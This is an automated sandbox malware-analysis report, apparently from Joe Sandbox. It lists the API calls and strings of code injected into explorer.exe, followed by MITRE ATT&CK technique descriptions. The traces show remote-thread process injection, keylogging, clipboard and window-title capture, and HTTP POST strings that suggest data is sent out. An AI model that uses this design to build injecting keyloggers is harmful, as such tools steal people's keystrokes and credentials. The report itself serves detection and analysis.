CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151A4E
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151A55
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00151A6B
GetProcAddress.KERNEL32(00000000), ref: 00151A72
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00151A88
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00151AB2
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00151AC5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151ACC
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151AD3
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00151AE7
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00151AFE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151B0B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151B11
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151B17
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00151B1A

Strings

ntdll, xrefs: 00151A66
0-gwP,gw, xrefs: 001519B6
atan, xrefs: 00151A61
opera_shared_counter, xrefs: 00151A31

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: 0-gwP,gw$atan$ntdll$opera_shared_counter
API String ID: 1066286714-1856671790
Opcode ID: a8cb1eca1f039efb322560a2676822f0c853bd55536fe071afcbd7f090d98c91
Instruction ID: ec8bcdfaf6af42dca227b71f4763b21e60e4cf6b7e42e918a7be394c4feb3b10
Opcode Fuzzy Hash: a8cb1eca1f039efb322560a2676822f0c853bd55536fe071afcbd7f090d98c91
Instruction Fuzzy Hash: CF617C71204345FFD311DF258C84E6BBBECEB89796F000519F9699B291D770DA488BA2

Function 00152799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 001527B5
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 001527CD
lstrlen.KERNEL32(?,00000000), ref: 001527D5
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 001527E0
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 001527FA
wsprintfA.USER32 ref: 00152811
CryptDestroyHash.ADVAPI32(?), ref: 0015282A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00152834

Strings

%02X, xrefs: 0015280B

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: e1f09dccf21decb0aa61b73014345121e8e96a7139dd8030c8ba022cd41b482e
Instruction ID: bc75d2af0dbc0b119f5a70d26e57c9bb1df71e770a83b6f94032bc2aa0505c18
Opcode Fuzzy Hash: e1f09dccf21decb0aa61b73014345121e8e96a7139dd8030c8ba022cd41b482e
Instruction Fuzzy Hash: 07113072900208FFDB119BA5DC88EEEBFBCEB48352F504065F925E6150D7714F959B60

Function 0015162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00151652
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0015167A

Strings

, xrefs: 00151699

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: KeyboardStateUnicode
String ID:
API String ID: 3453085656-3916222277
Opcode ID: 46a58feeda92eec4542475723bf5d4aff7ad5bcbe4ccdc6aad836ef1af2a1ede
Instruction ID: 5491197f2e2db466625601ef761375b4a8420f85e4a3d34c96767aab6ecd164c
Opcode Fuzzy Hash: 46a58feeda92eec4542475723bf5d4aff7ad5bcbe4ccdc6aad836ef1af2a1ede
Instruction Fuzzy Hash: C601C432900609FBDB31CB12DD85BFB73BCAF05702F08401AED21EA450D7F0D9898AA1

Function 001513AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(00155013,0000001C), ref: 001513C8
VirtualQuery.KERNEL32(001513AE,?,0000001C), ref: 001513DA
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0015140B
GetCurrentProcessId.KERNEL32(00000004), ref: 0015141C
wsprintfA.USER32 ref: 00151433
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00151448
GetLastError.KERNEL32 ref: 0015144E
RtlInitializeCriticalSection.NTDLL(0015582C), ref: 00151465
Sleep.KERNEL32(000001F4), ref: 00151489
GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 001514A6
GetProcAddress.KERNEL32(00000000), ref: 001514AF
GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 001514D0
GetProcAddress.KERNEL32(00000000), ref: 001514D3
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 001514F1
CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0015150D
CloseHandle.KERNEL32(00000000), ref: 00151514
RtlExitUserThread.NTDLL(00000000), ref: 0015152A

Strings

TranslateMessage, xrefs: 0015149C
GetClipboardData, xrefs: 001514C6
%s%d%d%d, xrefs: 0015142D
user32.dll, xrefs: 001514A1, 001514CB
kernel32.dll, xrefs: 001514EC

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
API String ID: 3628807430-1779906909
Opcode ID: 02047df2945614e94b3f061cb7112e3928986de2842079132b03e0447fb2eab2
Instruction ID: 6d6339c2546c423b7b2756a0178b8a5236394409b269fd25564b8e3e6b332133
Opcode Fuzzy Hash: 02047df2945614e94b3f061cb7112e3928986de2842079132b03e0447fb2eab2
Instruction Fuzzy Hash: E241D271600304FBD711AF65EC19E5B3BA9EB95793B004018FD228F691DB7599488BA0

Function 001516B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(0015582C), ref: 001516C4
lstrlenW.KERNEL32 ref: 001516DB
lstrlenW.KERNEL32 ref: 001516F3
wsprintfW.USER32 ref: 00151743
GetForegroundWindow.USER32 ref: 0015174E
GetWindowTextW.USER32(00000000,00155850,00000800), ref: 00151767
GetClassNameW.USER32(00000000,00155850,00000800), ref: 00151774
lstrcmpW.KERNEL32(00155020,00155850), ref: 00151781
lstrcpyW.KERNEL32(00155020,00155850), ref: 0015178D
wsprintfW.USER32 ref: 001517AD
lstrcatW.KERNEL32 ref: 001517C6
RtlLeaveCriticalSection.NTDLL(0015582C), ref: 001517D3

Strings

Clipboard -> , xrefs: 00151730
%s%s%s%s, xrefs: 001517A2
%s%s%s, xrefs: 00151738
New Window Caption -> , xrefs: 0015179A

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
API String ID: 2651329914-3371406555
Opcode ID: 68ddd939d099c2428ad4197d6d4829e154535c95fbb021a01b7e5b151a47ffc9
Instruction ID: 782793df83479614c051adcad28dce0b6f6739ec0cb37bb2498ae240c20af205
Opcode Fuzzy Hash: 68ddd939d099c2428ad4197d6d4829e154535c95fbb021a01b7e5b151a47ffc9
Instruction Fuzzy Hash: 4921B731500714FBD3222B3AEC99F2F3A59EB45BD77044024FC319F5A1DB219D8986B5

Function 001525F1 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00152603
GetCurrentThreadId.KERNEL32 ref: 0015260B
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0015261B
Thread32First.KERNEL32(00000000,0000001C), ref: 00152629
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00152648
SuspendThread.KERNEL32(00000000), ref: 00152658
CloseHandle.KERNEL32(00000000), ref: 00152667
Thread32Next.KERNEL32(00000000,0000001C), ref: 00152677
CloseHandle.KERNEL32(00000000), ref: 00152682

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: a4604862919d555728a7940e9c6fbd06124860219b7c6b83b841aed4a9f7c9a5
Instruction ID: c5a9e116002a90208200136a39fe5a992dcb03608b1b2cfd483d9cf591763e1c
Opcode Fuzzy Hash: a4604862919d555728a7940e9c6fbd06124860219b7c6b83b841aed4a9f7c9a5
Instruction Fuzzy Hash: 05118E32404300EFD7119F60AC4CA6FBFA4EF85793F040529FE669B590D7308A998BA3

Function 001520A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00152A09: GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
Part of subcall function 00152A09: RtlAllocateHeap.NTDLL(00000000), ref: 00152A13

Part of subcall function 0015298A: lstrlen.KERNEL32(00154FE2,?,00000000,00000000,001520DD,774C8A60,00154FE2,00000000), ref: 00152992
Part of subcall function 0015298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00154FE2,00000001,00000000,00000000), ref: 001529A4

Part of subcall function 001524CC: RtlZeroMemory.NTDLL(?,00000018), ref: 001524DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 00152139
wsprintfW.USER32 ref: 00152272
wsprintfW.USER32 ref: 001522DD
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 001523A7

Strings

Accept: */*Referer: %S, xrefs: 00152268
POST, xrefs: 00152223
Host: %s, xrefs: 001522D7
Content-Type: application/x-www-form-urlencoded, xrefs: 00152301

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 63c389fe2ecb63b3e9c1660a4ccc7c1323c1ad9e7a5e1f278616ee7106041c12
Instruction ID: 710b21c2e6c8245f6a093b55932e2f64e752382f29e250588d460367499626cf
Opcode Fuzzy Hash: 63c389fe2ecb63b3e9c1660a4ccc7c1323c1ad9e7a5e1f278616ee7106041c12
Instruction Fuzzy Hash: BBA16D72608740EFD3509F68D884A2BBBE8FB89785F04082DF9A5DB351DB74DD488B52

Function 001512AE Relevance: 7.6, APIs: 5, Instructions: 93
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001529BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,001512D9,00000000,00000000,?,00000001), ref: 001529C7

lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 001512DC

Part of subcall function 00152A09: GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
Part of subcall function 00152A09: RtlAllocateHeap.NTDLL(00000000), ref: 00152A13

PathMatchSpecA.SHLWAPI(?,00000000), ref: 0015138A

Part of subcall function 00152841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00151119,00000001), ref: 00152850
Part of subcall function 00152841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00151119,00000001), ref: 00152855

RtlZeroMemory.NTDLL(00000000,00000104), ref: 00151316
RtlMoveMemory.NTDLL(00000000,?,?), ref: 00151332

Part of subcall function 00152569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0015136E), ref: 00152591
Part of subcall function 00152569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0015259A

RtlMoveMemory.NTDLL(00000000,?,?), ref: 0015135F

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
String ID:
API String ID: 2993730741-0
Opcode ID: 29e87a89bdcf5b11906d811c65442e15cc5bee79ce166ca0678be142273a3621
Instruction ID: b5da5d170fd854c3d8880e239f7c6f673950ba63dae47a816c17fa7c396bd50c
Opcode Fuzzy Hash: 29e87a89bdcf5b11906d811c65442e15cc5bee79ce166ca0678be142273a3621
Instruction Fuzzy Hash: 66218C71704301EB8345EF2898A5A7EB79ABB94722B10052EFC72DB641DB34DD4D8A62

Function 00151581 Relevance: 7.6, APIs: 5, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalLock.KERNEL32(00000000), ref: 001515A9
lstrlenW.KERNEL32(00000000), ref: 001515C6
lstrcatW.KERNEL32(00000000,00000000), ref: 001515DC
lstrlenW.KERNEL32(00000000), ref: 00151600
GlobalUnlock.KERNEL32(00000000), ref: 0015161C

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: Globallstrlen$LockUnlocklstrcat
String ID:
API String ID: 1114890469-0
Opcode ID: 4cb829dee499ebc10873fd705285c0b6845a863a8246cfccad004a19da0a7924
Instruction ID: 3e3872fd8525e3d11e3775e78b610e7cc4c8f501fa4ad84be29f5a9c04adac15
Opcode Fuzzy Hash: 4cb829dee499ebc10873fd705285c0b6845a863a8246cfccad004a19da0a7924
Instruction Fuzzy Hash: D401E132A00211FB862767796C987BE62AE9BE7353B084129FC369F251EF748D4E4250

Function 00151BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 00151BF4
LoadLibraryA.KERNEL32(?,00155848,00000000,00000000,774D2EE0,00000000,001519B6,?,?,?,00000001,?,00000000), ref: 00151C1C
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00151C49
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00151C9A

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: d8499b2a1fe2f303b891e3f79f62752bac885b909efac59f3d6af44e378e148e
Instruction ID: 48f112104f56b443d9745dd30bbc0c75c5e65a26268bc01f11f2b850180472ce
Opcode Fuzzy Hash: d8499b2a1fe2f303b891e3f79f62752bac885b909efac59f3d6af44e378e148e
Instruction Fuzzy Hash: A631CE71640212FBCB1ACF29C8C4B66B7A8BF15316B15452CEC66CF640D732E849DBA0

Function 0015182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0015582C), ref: 00151839
lstrlenW.KERNEL32 ref: 00151845
RtlLeaveCriticalSection.NTDLL(0015582C), ref: 001518A9
Sleep.KERNEL32(00007530), ref: 001518B4

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleeplstrlen
String ID:
API String ID: 2134730579-0
Opcode ID: f891cfa0275cc57ba454404847f686ec34f1996253a198ea09c2c2c41daf7c8f
Instruction ID: ef00ffc34f2f048606fb1ccb827fbc5a33f28e35fc781a36824d19703fadf822
Opcode Fuzzy Hash: f891cfa0275cc57ba454404847f686ec34f1996253a198ea09c2c2c41daf7c8f
Instruction Fuzzy Hash: 6801DB31510700EBD7256765EC6953E3AAAEB427537100018F8218F7E1DF748D49DBA1

Function 001526C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,001511DD), ref: 001526DB
IsWow64Process.KERNEL32(000000FF,?), ref: 001526ED
IsWow64Process.KERNEL32(00000000,?), ref: 00152700
CloseHandle.KERNEL32(00000000), ref: 00152716

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: c8252480bd976e46c305f6a6e6dd0fbe5f88df05621c2168c64673105a27577d
Instruction ID: 1d0a8d2e06c2038f58e8cc400d82bd78177f59396c3e746dc89d26d0ee3ef5e0
Opcode Fuzzy Hash: c8252480bd976e46c305f6a6e6dd0fbe5f88df05621c2168c64673105a27577d
Instruction Fuzzy Hash: F6F09672801318FF9B14CF909D448AEB77DDF09292B20025AF92097180D7304F4496A0

Function 001517DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00152A09: GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
Part of subcall function 00152A09: RtlAllocateHeap.NTDLL(00000000), ref: 00152A13

GetLocalTime.KERNEL32(?,00000000), ref: 001517F3
wsprintfW.USER32 ref: 0015181D

Strings

[%02d.%02d.%d %02d:%02d:%02d], xrefs: 00151817

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID: [%02d.%02d.%d %02d:%02d:%02d]
API String ID: 377395780-613334611
Opcode ID: cfce72b3618a7c47a9e65667863438cd17e088fed2e4d8986b934ffd60c6be69
Instruction ID: f600240ef4a96efa131b933c508bbd1f37af75c9e0aeebf5a7652ade13498645
Opcode Fuzzy Hash: cfce72b3618a7c47a9e65667863438cd17e088fed2e4d8986b934ffd60c6be69
Instruction Fuzzy Hash: 6FF03762900128FAC71457D99C458FFB3FCEB0C742B00014AFE51D6180E6785A90D3B5

Analysis Process: explorer.exePID: 4576, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	13.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00AC370C Relevance: 1.6, APIs: 1, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00AC378C

Memory Dump Source

Source File: 0000001F.00000002.2534674582.0000000000AC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_ac1000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction ID: a62660d8606c5dc6a0f0864961087c61048e2983316e20ce18c631c2a007f4f8
Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction Fuzzy Hash: 4711B2747019094FFF58FBB8989DB7533E1EB18312F55802DA815C72A2EE39CA918700

Function 00AC34C4 Relevance: 10.7, APIs: 7, Instructions: 195
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AC1BF8: OpenFileMappingA.KERNEL32 ref: 00AC1C0F
Part of subcall function 00AC1BF8: MapViewOfFile.KERNELBASE ref: 00AC1C2E

CreateToolhelp32Snapshot.KERNEL32 ref: 00AC35B7
Process32First.KERNEL32 ref: 00AC35DA
CharLowerA.USER32 ref: 00AC35EE
Process32Next.KERNEL32 ref: 00AC36CD
CloseHandle.KERNELBASE ref: 00AC36DE
SysFreeMap.PGOCR ref: 00AC36F7
SleepEx.KERNELBASE ref: 00AC3701

Memory Dump Source

Source File: 0000001F.00000002.2534674582.0000000000AC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_ac1000_explorer.jbxd

Similarity

API ID: FileProcess32$CharCloseCreateFirstFreeHandleLowerMappingNextOpenSleepSnapshotToolhelp32View
String ID:
API String ID: 2386764625-0
Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction ID: 29187b0d990a4ba7a4b67a5153df0369a621bee5c54b95e21958378aa888cc9d
Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction Fuzzy Hash: 0B51A631308A088FDB19FF28D999FAA73E1EB95310F45461DE45BC72A2DF38DA058781

Function 00ACB4A8 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00ACB5A7
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00ACB651
VirtualProtect.KERNELBASE ref: 00ACB66F

Memory Dump Source

Source File: 0000001F.00000002.2534674582.0000000000ACA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00ACA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_aca000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction ID: a671c3faf825e95304c557a35c7880db94f9d001a9d321a57524edc61561d378
Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction Fuzzy Hash: D6517A3177891D4BCB24AB789C82BF4B7D1F755325F19062EC49BC3285D76AC84683A1

Function 00AC1BF8 Relevance: 3.0, APIs: 2, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32 ref: 00AC1C0F
MapViewOfFile.KERNELBASE ref: 00AC1C2E

Memory Dump Source

Source File: 0000001F.00000002.2534674582.0000000000AC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_ac1000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction ID: 02a629ecc7b4481a1600063ed2c05e0c50342d9d4224abfee090ed9ab2dcc41d
Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction Fuzzy Hash: BFF01234318F4D4FAB45EF7C9C9C236B7E1EBA8202744857EA85AC6165EF34C8458711

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
